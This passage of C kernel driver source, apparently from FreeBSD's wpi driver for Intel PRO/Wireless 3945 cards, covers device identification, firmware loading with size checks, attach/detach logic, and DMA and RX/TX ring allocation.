WPI_DEBUG_WATCHDOG = 0x00000800, /* Watch dog debug */ WPI_DEBUG_ANY = 0xffffffff }; static int wpi_debug = 0; SYSCTL_INT(_debug, OID_AUTO, wpi, CTLFLAG_RW, &wpi_debug, 0, "wpi debug level"); TUNABLE_INT("debug.wpi", &wpi_debug); #else #define DPRINTF(x) #define DPRINTFN(n, x) #define WPI_DEBUG_SET 0 #endif struct wpi_ident { uint16_t vendor; uint16_t device; uint16_t subdevice; const char *name; }; static const struct wpi_ident wpi_ident_table[] = { /* The below entries support ABG regardless of the subid */ { 0x8086, 0x4222, 0x0, "Intel(R) PRO/Wireless 3945ABG" }, { 0x8086, 0x4227, 0x0, "Intel(R) PRO/Wireless 3945ABG" }, /* The below entries only support BG */ { 0x8086, 0x4222, 0x1005, "Intel(R) PRO/Wireless 3945BG" }, { 0x8086, 0x4222, 0x1034, "Intel(R) PRO/Wireless 3945BG" }, { 0x8086, 0x4227, 0x1014, "Intel(R) PRO/Wireless 3945BG" }, { 0x8086, 0x4222, 0x1044, "Intel(R) PRO/Wireless 3945BG" }, { 0, 0, 0, NULL } }; static struct ieee80211vap *wpi_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void wpi_vap_delete(struct ieee80211vap *); static int wpi_dma_contig_alloc(struct wpi_softc *, struct wpi_dma_info *, void **, bus_size_t, bus_size_t, int); static void wpi_dma_contig_free(struct wpi_dma_info *); static void wpi_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int wpi_alloc_shared(struct wpi_softc *); static void wpi_free_shared(struct wpi_softc *); static int wpi_alloc_rx_ring(struct wpi_softc *, struct wpi_rx_ring *); static void wpi_reset_rx_ring(struct wpi_softc *, struct wpi_rx_ring *); static void wpi_free_rx_ring(struct wpi_softc *, struct wpi_rx_ring *); static int wpi_alloc_tx_ring(struct wpi_softc *, struct wpi_tx_ring *, int, int); static void wpi_reset_tx_ring(struct wpi_softc *, struct wpi_tx_ring *); static void wpi_free_tx_ring(struct wpi_softc *, struct wpi_tx_ring *); static int wpi_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void wpi_mem_lock(struct wpi_softc *); static void wpi_mem_unlock(struct wpi_softc *); static uint32_t wpi_mem_read(struct wpi_softc *, uint16_t); static void wpi_mem_write(struct wpi_softc *, uint16_t, uint32_t); static void wpi_mem_write_region_4(struct wpi_softc *, uint16_t, const uint32_t *, int); static uint16_t wpi_read_prom_data(struct wpi_softc *, uint32_t, void *, int); static int wpi_alloc_fwmem(struct wpi_softc *); static void wpi_free_fwmem(struct wpi_softc *); static int wpi_load_firmware(struct wpi_softc *); static void wpi_unload_firmware(struct wpi_softc *); static int wpi_load_microcode(struct wpi_softc *, const uint8_t *, int); static void wpi_rx_intr(struct wpi_softc *, struct wpi_rx_desc *, struct wpi_rx_data *); static void wpi_tx_intr(struct wpi_softc *, struct wpi_rx_desc *); static void wpi_cmd_intr(struct wpi_softc *, struct wpi_rx_desc *); static void wpi_notif_intr(struct wpi_softc *); static void wpi_intr(void *); static uint8_t wpi_plcp_signal(int); static void wpi_watchdog(void *); static int wpi_tx_data(struct wpi_softc *, struct mbuf *, struct ieee80211_node *, int); static void wpi_start(struct ifnet *); static void wpi_start_locked(struct ifnet *); static int wpi_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void wpi_scan_start(struct ieee80211com *); static void wpi_scan_end(struct ieee80211com *); static void wpi_set_channel(struct ieee80211com *); static void wpi_scan_curchan(struct ieee80211_scan_state *, unsigned long); static void wpi_scan_mindwell(struct ieee80211_scan_state *); static int wpi_ioctl(struct ifnet *, u_long, caddr_t); static void wpi_read_eeprom(struct wpi_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static void wpi_read_eeprom_channels(struct wpi_softc *, int); static void wpi_read_eeprom_group(struct wpi_softc *, int); static int wpi_cmd(struct wpi_softc *, int, const void *, int, int); static int wpi_wme_update(struct ieee80211com *); static int wpi_mrr_setup(struct wpi_softc *); static void wpi_set_led(struct wpi_softc *, uint8_t, uint8_t, uint8_t); static void wpi_enable_tsf(struct wpi_softc *, struct ieee80211_node *); #if 0 static int wpi_setup_beacon(struct wpi_softc *, struct ieee80211_node *); #endif static int wpi_auth(struct wpi_softc *, struct ieee80211vap *); static int wpi_run(struct wpi_softc *, struct ieee80211vap *); static int wpi_scan(struct wpi_softc *); static int wpi_config(struct wpi_softc *); static void wpi_stop_master(struct wpi_softc *); static int wpi_power_up(struct wpi_softc *); static int wpi_reset(struct wpi_softc *); static void wpi_hwreset(void *, int); static void wpi_rfreset(void *, int); static void wpi_hw_config(struct wpi_softc *); static void wpi_init(void *); static void wpi_init_locked(struct wpi_softc *, int); static void wpi_stop(struct wpi_softc *); static void wpi_stop_locked(struct wpi_softc *); static int wpi_set_txpower(struct wpi_softc *, struct ieee80211_channel *, int); static void wpi_calib_timeout(void *); static void wpi_power_calibration(struct wpi_softc *, int); static int wpi_get_power_index(struct wpi_softc *, struct wpi_power_group *, struct ieee80211_channel *, int); #ifdef WPI_DEBUG static const char *wpi_cmd_str(int); #endif static int wpi_probe(device_t); static int wpi_attach(device_t); static int wpi_detach(device_t); static int wpi_shutdown(device_t); static int wpi_suspend(device_t); static int wpi_resume(device_t); static device_method_t wpi_methods[] = { /* Device interface */ DEVMETHOD(device_probe, wpi_probe), DEVMETHOD(device_attach, wpi_attach), DEVMETHOD(device_detach, wpi_detach), DEVMETHOD(device_shutdown, wpi_shutdown), DEVMETHOD(device_suspend, wpi_suspend), DEVMETHOD(device_resume, wpi_resume), DEVMETHOD_END }; static driver_t wpi_driver = { "wpi", wpi_methods, sizeof (struct wpi_softc) }; static devclass_t wpi_devclass; DRIVER_MODULE(wpi, pci, wpi_driver, wpi_devclass, NULL, NULL); MODULE_VERSION(wpi, 1); static const uint8_t wpi_ridx_to_plcp[] = { /* OFDM: IEEE Std 802.11a-1999, pp. 14 Table 80 */ /* R1-R4 (ral/ural is R4-R1) */ 0xd, 0xf, 0x5, 0x7, 0x9, 0xb, 0x1, 0x3, /* CCK: device-dependent */ 10, 20, 55, 110 }; static const uint8_t wpi_ridx_to_rate[] = { 12, 18, 24, 36, 48, 72, 96, 108, /* OFDM */ 2, 4, 11, 22 /*CCK */ }; static int wpi_probe(device_t dev) { const struct wpi_ident *ident; for (ident = wpi_ident_table; ident->name != NULL; ident++) { if (pci_get_vendor(dev) == ident->vendor && pci_get_device(dev) == ident->device) { device_set_desc(dev, ident->name); return (BUS_PROBE_DEFAULT); } } return ENXIO; } /** * Load the firmare image from disk to the allocated dma buffer. * we also maintain the reference to the firmware pointer as there * is times where we may need to reload the firmware but we are not * in a context that can access the filesystem (ie taskq cause by restart) * * @return 0 on success, an errno on failure */ static int wpi_load_firmware(struct wpi_softc *sc) { const struct firmware *fp; struct wpi_dma_info *dma = &sc->fw_dma; const struct wpi_firmware_hdr *hdr; const uint8_t *itext, *idata, *rtext, *rdata, *btext; uint32_t itextsz, idatasz, rtextsz, rdatasz, btextsz; int error; DPRINTFN(WPI_DEBUG_FIRMWARE, ("Attempting Loading Firmware from wpi_fw module\n")); WPI_UNLOCK(sc); if (sc->fw_fp == NULL && (sc->fw_fp = firmware_get("wpifw")) == NULL) { device_printf(sc->sc_dev, "could not load firmware image 'wpifw'\n"); error = ENOENT; WPI_LOCK(sc); goto fail; } fp = sc->fw_fp; WPI_LOCK(sc); /* Validate the firmware is minimum a particular version */ if (fp->version < WPI_FW_MINVERSION) { device_printf(sc->sc_dev, "firmware version is too old. Need %d, got %d\n", WPI_FW_MINVERSION, fp->version); error = ENXIO; goto fail; } if (fp->datasize < sizeof (struct wpi_firmware_hdr)) { device_printf(sc->sc_dev, "firmware file too short: %zu bytes\n", fp->datasize); error = ENXIO; goto fail; } hdr = (const struct wpi_firmware_hdr *)fp->data; /* | RUNTIME FIRMWARE | INIT FIRMWARE | BOOT FW | |HDR|<--TEXT-->|<--DATA-->|<--TEXT-->|<--DATA-->|<--TEXT-->| */ rtextsz = le32toh(hdr->rtextsz); rdatasz = le32toh(hdr->rdatasz); itextsz = le32toh(hdr->itextsz); idatasz = le32toh(hdr->idatasz); btextsz = le32toh(hdr->btextsz); /* check that all firmware segments are present */ if (fp->datasize < sizeof (struct wpi_firmware_hdr) + rtextsz + rdatasz + itextsz + idatasz + btextsz) { device_printf(sc->sc_dev, "firmware file too short: %zu bytes\n", fp->datasize); error = ENXIO; /* XXX appropriate error code? */ goto fail; } /* get pointers to firmware segments */ rtext = (const uint8_t *)(hdr + 1); rdata = rtext + rtextsz; itext = rdata + rdatasz; idata = itext + itextsz; btext = idata + idatasz; DPRINTFN(WPI_DEBUG_FIRMWARE, ("Firmware Version: Major %d, Minor %d, Driver %d, \n" "runtime (text: %u, data: %u) init (text: %u, data %u) boot (text %u)\n", (le32toh(hdr->version) & 0xff000000) >> 24, (le32toh(hdr->version) & 0x00ff0000) >> 16, (le32toh(hdr->version) & 0x0000ffff), rtextsz, rdatasz, itextsz, idatasz, btextsz)); DPRINTFN(WPI_DEBUG_FIRMWARE,("rtext 0x%x\n", *(const uint32_t *)rtext)); DPRINTFN(WPI_DEBUG_FIRMWARE,("rdata 0x%x\n", *(const uint32_t *)rdata)); DPRINTFN(WPI_DEBUG_FIRMWARE,("itext 0x%x\n", *(const uint32_t *)itext)); DPRINTFN(WPI_DEBUG_FIRMWARE,("idata 0x%x\n", *(const uint32_t *)idata)); DPRINTFN(WPI_DEBUG_FIRMWARE,("btext 0x%x\n", *(const uint32_t *)btext)); /* sanity checks */ if (rtextsz > WPI_FW_MAIN_TEXT_MAXSZ || rdatasz > WPI_FW_MAIN_DATA_MAXSZ || itextsz > WPI_FW_INIT_TEXT_MAXSZ || idatasz > WPI_FW_INIT_DATA_MAXSZ || btextsz > WPI_FW_BOOT_TEXT_MAXSZ || (btextsz & 3) != 0) { device_printf(sc->sc_dev, "firmware invalid\n"); error = EINVAL; goto fail; } /* copy initialization images into pre-allocated DMA-safe memory */ memcpy(dma->vaddr, idata, idatasz); memcpy(dma->vaddr + WPI_FW_INIT_DATA_MAXSZ, itext, itextsz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); /* tell adapter where to find initialization images */ wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_DATA_BASE, dma->paddr); wpi_mem_write(sc, WPI_MEM_DATA_SIZE, idatasz); wpi_mem_write(sc, WPI_MEM_TEXT_BASE, dma->paddr + WPI_FW_INIT_DATA_MAXSZ); wpi_mem_write(sc, WPI_MEM_TEXT_SIZE, itextsz); wpi_mem_unlock(sc); /* load firmware boot code */ if ((error = wpi_load_microcode(sc, btext, btextsz)) != 0) { device_printf(sc->sc_dev, "Failed to load microcode\n"); goto fail; } /* now press "execute" */ WPI_WRITE(sc, WPI_RESET, 0); /* wait at most one second for the first alive notification */ if ((error = msleep(sc, &sc->sc_mtx, PCATCH, "wpiinit", hz)) != 0) { device_printf(sc->sc_dev, "timeout waiting for adapter to initialize\n"); goto fail; } /* copy runtime images into pre-allocated DMA-sage memory */ memcpy(dma->vaddr, rdata, rdatasz); memcpy(dma->vaddr + WPI_FW_MAIN_DATA_MAXSZ, rtext, rtextsz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); /* tell adapter where to find runtime images */ wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_DATA_BASE, dma->paddr); wpi_mem_write(sc, WPI_MEM_DATA_SIZE, rdatasz); wpi_mem_write(sc, WPI_MEM_TEXT_BASE, dma->paddr + WPI_FW_MAIN_DATA_MAXSZ); wpi_mem_write(sc, WPI_MEM_TEXT_SIZE, WPI_FW_UPDATED | rtextsz); wpi_mem_unlock(sc); /* wait at most one second for the first alive notification */ if ((error = msleep(sc, &sc->sc_mtx, PCATCH, "wpiinit", hz)) != 0) { device_printf(sc->sc_dev, "timeout waiting for adapter to initialize2\n"); goto fail; } DPRINTFN(WPI_DEBUG_FIRMWARE, ("Firmware loaded to driver successfully\n")); return error; fail: wpi_unload_firmware(sc); return error; } /** * Free the referenced firmware image */ static void wpi_unload_firmware(struct wpi_softc *sc) { if (sc->fw_fp) { WPI_UNLOCK(sc); firmware_put(sc->fw_fp, FIRMWARE_UNLOAD); WPI_LOCK(sc); sc->fw_fp = NULL; } } static int wpi_attach(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); struct ifnet *ifp; struct ieee80211com *ic; int ac, error, rid, supportsa = 1; uint32_t tmp; const struct wpi_ident *ident; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; if (bootverbose || WPI_DEBUG_SET) device_printf(sc->sc_dev,"Driver Revision %s\n", VERSION); /* * Some card's only support 802.11b/g not a, check to see if * this is one such card. A 0x0 in the subdevice table indicates * the entire subdevice range is to be ignored. */ for (ident = wpi_ident_table; ident->name != NULL; ident++) { if (ident->subdevice && pci_get_subdevice(dev) == ident->subdevice) { supportsa = 0; break; } } /* Create the tasks that can be queued */ TASK_INIT(&sc->sc_restarttask, 0, wpi_hwreset, sc); TASK_INIT(&sc->sc_radiotask, 0, wpi_rfreset, sc); WPI_LOCK_INIT(sc); callout_init_mtx(&sc->calib_to, &sc->sc_mtx, 0); callout_init_mtx(&sc->watchdog_to, &sc->sc_mtx, 0); /* disable the retry timeout register */ pci_write_config(dev, 0x41, 0, 1); /* enable bus-mastering */ pci_enable_busmaster(dev); rid = PCIR_BAR(0); sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &rid, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "could not allocate memory resource\n"); error = ENOMEM; goto fail; } sc->sc_st = rman_get_bustag(sc->mem); sc->sc_sh = rman_get_bushandle(sc->mem); rid = 0; sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &rid, RF_ACTIVE | RF_SHAREABLE); if (sc->irq == NULL) { device_printf(dev, "could not allocate interrupt resource\n"); error = ENOMEM; goto fail; } /* * Allocate DMA memory for firmware transfers. */ if ((error = wpi_alloc_fwmem(sc)) != 0) { printf(": could not allocate firmware memory\n"); error = ENOMEM; goto fail; } /* * Put adapter into a known state. */ if ((error = wpi_reset(sc)) != 0) { device_printf(dev, "could not reset adapter\n"); goto fail; } wpi_mem_lock(sc); tmp = wpi_mem_read(sc, WPI_MEM_PCIDEV); if (bootverbose || WPI_DEBUG_SET) device_printf(sc->sc_dev, "Hardware Revision (0x%X)\n", tmp); wpi_mem_unlock(sc); /* Allocate shared page */ if ((error = wpi_alloc_shared(sc)) != 0) { device_printf(dev, "could not allocate shared page\n"); goto fail; } /* tx data queues - 4 for QoS purposes */ for (ac = 0; ac < WME_NUM_AC; ac++) { error = wpi_alloc_tx_ring(sc, &sc->txq[ac], WPI_TX_RING_COUNT, ac); if (error != 0) { device_printf(dev, "could not allocate Tx ring %d\n",ac); goto fail; } } /* command queue to talk to the card's firmware */ error = wpi_alloc_tx_ring(sc, &sc->cmdq, WPI_CMD_RING_COUNT, 4); if (error != 0) { device_printf(dev, "could not allocate command ring\n"); goto fail; } /* receive data queue */ error = wpi_alloc_rx_ring(sc, &sc->rxq); if (error != 0) { device_printf(dev, "could not allocate Rx ring\n"); goto fail; } ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); error = ENOMEM; goto fail; } ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_TXPMGT /* tx power management */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_WPA /* 802.11i */ /* XXX looks like WME is partly supported? */ #if 0 | IEEE80211_C_IBSS /* IBSS mode support */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_WME /* 802.11e */ | IEEE80211_C_HOSTAP /* Host access point mode */ #endif ; /* * Read in the eeprom and also setup the channels for * net80211. We don't set the rates as net80211 does this for us */ wpi_read_eeprom(sc, macaddr); if (bootverbose || WPI_DEBUG_SET) { device_printf(sc->sc_dev, "Regulatory Domain: %.4s\n", sc->domain); device_printf(sc->sc_dev, "Hardware Type: %c\n", sc->type > 1 ? 'B': '?'); device_printf(sc->sc_dev, "Hardware Revision: %c\n", ((le16toh(sc->rev) & 0xf0) == 0xd0) ? 'D': '?'); device_printf(sc->sc_dev, "SKU %s support 802.11a\n", supportsa ? "does" : "does not"); /* XXX hw_config uses the PCIDEV for the Hardware rev. Must check what sc->rev really represents - benjsc 20070615 */ } if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_softc = sc; ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = wpi_init; ifp->if_ioctl = wpi_ioctl; ifp->if_start = wpi_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ieee80211_ifattach(ic, macaddr); /* override default methods */ ic->ic_raw_xmit = wpi_raw_xmit; ic->ic_wme.wme_update = wpi_wme_update; ic->ic_scan_start = wpi_scan_start; ic->ic_scan_end = wpi_scan_end; ic->ic_set_channel = wpi_set_channel; ic->ic_scan_curchan = wpi_scan_curchan; ic->ic_scan_mindwell = wpi_scan_mindwell; ic->ic_vap_create = wpi_vap_create; ic->ic_vap_delete = wpi_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), WPI_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), WPI_RX_RADIOTAP_PRESENT); /* * Hook our interrupt after all initialization is complete. */ error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET |INTR_MPSAFE, NULL, wpi_intr, sc, &sc->sc_ih); if (error != 0) { device_printf(dev, "could not set up interrupt\n"); goto fail; } if (bootverbose) ieee80211_announce(ic); #ifdef XXX_DEBUG ieee80211_announce_channels(ic); #endif return 0; fail: wpi_detach(dev); return ENXIO; } static int wpi_detach(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; int ac; if (sc->irq != NULL) bus_teardown_intr(dev, sc->irq, sc->sc_ih); if (ifp != NULL) { ic = ifp->if_l2com; ieee80211_draintask(ic, &sc->sc_restarttask); ieee80211_draintask(ic, &sc->sc_radiotask); wpi_stop(sc); callout_drain(&sc->watchdog_to); callout_drain(&sc->calib_to); ieee80211_ifdetach(ic); } WPI_LOCK(sc); if (sc->txq[0].data_dmat) { for (ac = 0; ac < WME_NUM_AC; ac++) wpi_free_tx_ring(sc, &sc->txq[ac]); wpi_free_tx_ring(sc, &sc->cmdq); wpi_free_rx_ring(sc, &sc->rxq); wpi_free_shared(sc); } if (sc->fw_fp != NULL) { wpi_unload_firmware(sc); } if (sc->fw_dma.tag) wpi_free_fwmem(sc); WPI_UNLOCK(sc); if (sc->irq != NULL) bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); if (sc->mem != NULL) bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); if (ifp != NULL) if_free(ifp); WPI_LOCK_DESTROY(sc); return 0; } static struct ieee80211vap * wpi_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct wpi_vap *wvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; wvp = (struct wpi_vap *) malloc(sizeof(struct wpi_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (wvp == NULL) return NULL; vap = &wvp->vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override with driver methods */ wvp->newstate = vap->iv_newstate; vap->iv_newstate = wpi_newstate; ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void wpi_vap_delete(struct ieee80211vap *vap) { struct wpi_vap *wvp = WPI_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(wvp, M_80211_VAP); } static void wpi_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nsegs, int error) { if (error != 0) return; KASSERT(nsegs == 1, ("too many DMA segments, %d should be 1", nsegs)); *(bus_addr_t *)arg = segs[0].ds_addr; } /* * Allocates a contiguous block of dma memory of the requested size and * alignment. Due to limitations of the FreeBSD dma subsystem as of 20071217, * allocations greater than 4096 may fail. Hence if the requested alignment is * greater we allocate 'alignment' size extra memory and shift the vaddr and * paddr after the dma load. This bypasses the problem at the cost of a little * more memory. */ static int wpi_dma_contig_alloc(struct wpi_softc *sc, struct wpi_dma_info *dma, void **kvap, bus_size_t size, bus_size_t alignment, int flags) { int error; bus_size_t align; bus_size_t reqsize; DPRINTFN(WPI_DEBUG_DMA, ("Size: %zd - alignment %zd\n", size, alignment)); dma->size = size; dma->tag = NULL; if (alignment > 4096) { align = PAGE_SIZE; reqsize = size + alignment; } else { align = alignment; reqsize = size; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), align, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, reqsize, 1, reqsize, flags, NULL, NULL, &dma->tag); if (error != 0) { device_printf(sc->sc_dev, "could not create shared page DMA tag\n"); goto fail; } error = bus_dmamem_alloc(dma->tag, (void **)&dma->vaddr_start, flags | BUS_DMA_ZERO, &dma->map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate shared page DMA memory\n"); goto fail; } error = bus_dmamap_load(dma->tag, dma->map, dma->vaddr_start, reqsize, wpi_dma_map_addr, &dma->paddr_start, flags); /* Save the original pointers so we can free all the memory */ dma->paddr = dma->paddr_start; dma->vaddr = dma->vaddr_start; /* * Check the alignment and increment by 4096 until we get the * requested alignment. Fail if can't obtain the alignment * we requested. */ if ((dma->paddr & (alignment -1 )) != 0) { int i; for (i = 0; i < alignment / 4096; i++) { if ((dma->paddr & (alignment - 1 )) == 0) break; dma->paddr += 4096; dma->vaddr += 4096; } if (i == alignment / 4096) { device_printf(sc->sc_dev, "alignment requirement was not satisfied\n"); goto fail; } } if (error != 0) { device_printf(sc->sc_dev, "could not load shared page DMA map\n"); goto fail; } if (kvap != NULL) *kvap = dma->vaddr; return 0; fail: wpi_dma_contig_free(dma); return error; } static void wpi_dma_contig_free(struct wpi_dma_info *dma) { if (dma->tag) { if (dma->map != NULL) { if (dma->paddr_start != 0) { bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(dma->tag, dma->map); } bus_dmamem_free(dma->tag, &dma->vaddr_start, dma->map); } bus_dma_tag_destroy(dma->tag); } } /* * Allocate a shared page between host and NIC. */ static int wpi_alloc_shared(struct wpi_softc *sc) { int error; error = wpi_dma_contig_alloc(sc, &sc->shared_dma, (void **)&sc->shared, sizeof (struct wpi_shared), PAGE_SIZE, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate shared area DMA memory\n"); } return error; } static void wpi_free_shared(struct wpi_softc *sc) { wpi_dma_contig_free(&sc->shared_dma); } static int wpi_alloc_rx_ring(struct wpi_softc *sc, struct wpi_rx_ring *ring) { int i, error; ring->cur = 0; error = wpi_dma_contig_alloc(sc, &ring->desc_dma, (void **)&ring->desc, WPI_RX_RING_COUNT * sizeof (uint32_t), WPI_RING_DMA_ALIGN, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate rx ring DMA memory, error %d\n", __func__, error); goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MJUMPAGESIZE, 1, MJUMPAGESIZE, BUS_DMA_NOWAIT, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "%s: bus_dma_tag_create_failed, error %d\n", __func__, error); goto fail; } /* * Setup Rx buffers. */ for (i = 0; i < WPI_RX_RING_COUNT; i++) { struct wpi_rx_data *data = &ring->data[i]; struct mbuf *m; bus_addr_t paddr; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "%s: bus_dmamap_create failed, error %d\n", __func__, error); goto fail; } m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE); if (m == NULL) { device_printf(sc->sc_dev, "%s: could not allocate rx mbuf\n", __func__); error = ENOMEM; goto fail; } /* map page */ error = bus_dmamap_load(ring->data_dmat, data->map, mtod(m, caddr_t), MJUMPAGESIZE, wpi_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "%s: bus_dmamap_load failed, error %d\n", __func__, error); m_freem(m); error = ENOMEM; /* XXX unique code */ goto fail; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); data->m = m; ring->desc[i] = htole32(paddr); } bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); return 0; fail: wpi_free_rx_ring(sc, ring); return error; } static void wpi_reset_rx_ring(struct wpi_softc *sc, struct wpi_rx_ring *ring) { int ntries; wpi_mem_lock(sc); WPI_WRITE(sc, WPI_RX_CONFIG, 0); for (ntries = 0; ntries < 100; ntries++) { if (WPI_READ(sc, WPI_RX_STATUS) & WPI_RX_IDLE) break; DELAY(10); } wpi_mem_unlock(sc); #ifdef WPI_DEBUG if (ntries == 100 && wpi_debug > 0) device_printf(sc->sc_dev, "timeout resetting Rx ring\n"); #endif ring->cur = 0; } static void wpi_free_rx_ring(struct wpi_softc *sc, struct wpi_rx_ring *ring) { int i; wpi_dma_contig_free(&ring->desc_dma); for (i = 0; i < WPI_RX_RING_COUNT; i++) { struct wpi_rx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } } static int wpi_alloc_tx_ring(struct wpi_softc *sc, struct wpi_tx_ring *ring, int count, int qid) { struct wpi_tx_data *data; int i, error; ring->qid = qid; ring->count = count; ring->queued = 0; ring->cur = 0; ring->data = NULL; error = wpi_dma_contig_alloc(sc, &ring->desc_dma, (void **)&ring->desc, count * sizeof (struct wpi_tx_desc), WPI_RING_DMA_ALIGN, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate tx dma memory\n"); goto fail; } /* update shared page with ring's base address */ sc->shared->txbase[qid] = htole32(ring->desc_dma.paddr); error = wpi_dma_contig_alloc(sc, &ring->cmd_dma, (void **)&ring->cmd, count * sizeof (struct wpi_tx_cmd), WPI_RING_DMA_ALIGN, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate tx command DMA memory\n"); goto fail; } ring->data = malloc(count * sizeof (struct wpi_tx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate tx data slots\n"); goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, WPI_MAX_SCATTER - 1, MCLBYTES, BUS_DMA_NOWAIT, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { data = &ring->data[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create tx buf DMA map\n"); goto fail; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); } return 0; fail: wpi_free_tx_ring(sc, ring); return error; } static void wpi_reset_tx_ring(struct wpi_softc *sc, struct wpi_tx_ring *ring) { struct wpi_tx_data *data; int i, ntries; wpi_mem_lock(sc); WPI_WRITE(sc, WPI_TX_CONFIG(ring->qid), 0); for (ntries = 0; ntries < 100; ntries++) { if (WPI_READ(sc, WPI_TX_STATUS) & WPI_TX_IDLE(ring->qid)) break; DELAY(10); } #ifdef WPI_DEBUG if (ntries == 100 && wpi_debug > 0) device_printf(sc->sc_dev, "timeout resetting Tx ring %d\n", ring->qid); #endif wpi_mem_unlock(sc); for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } } ring->queued = 0; ring->cur = 0; } static void wpi_free_tx_ring(struct wpi_softc *sc, struct wpi_tx_ring *ring) { struct wpi_tx_data *data; int i; wpi_dma_contig_free(&ring->desc_dma); wpi_dma_contig_free(&ring->cmd_dma); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } 